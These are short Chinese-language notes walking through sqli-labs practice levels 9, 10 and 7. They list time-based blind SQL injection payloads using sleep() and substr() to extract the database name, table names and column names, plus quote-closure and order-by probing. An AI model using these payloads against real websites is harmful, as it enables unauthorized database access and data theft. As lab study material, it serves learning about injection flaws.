Less9:
输入 ?id=1
输入 ?id=1' 页面无变化
输入 ?id=1" 页面无变化
输入 ?id=1') 页面无变化
输入 ?id=1“) 页面无变化
此时,想到使用时间注入。输入 ?id=1' and sleep(5) --+ 反应超过五秒
输入 ?id=1' and if (length(database())>8,sleep(5),1) --+ 判断数据库名长度
输入 ?id=1' and if (substr(database(),1,1)='e',sleep(5),1) --+ 获取数据库名
输入 ?id=1' and if (substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(5),1) --+ 获取表名
输入 ?id=1' and if (substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='u',sleep(5),1) --+ 获取字段名
Less10:
输入 ?id=1
输入 ?id=1" and sleep(3) --+
接下来的步骤与第九关一样
(Less7):
输入 ?id=1
输入 ?id=1')
输入 ?id=1') order by 3 --+ 发现页面输出错误
输入 ?id=1')) order by 3 --+ 页面输出正常
接下来按步骤进行即可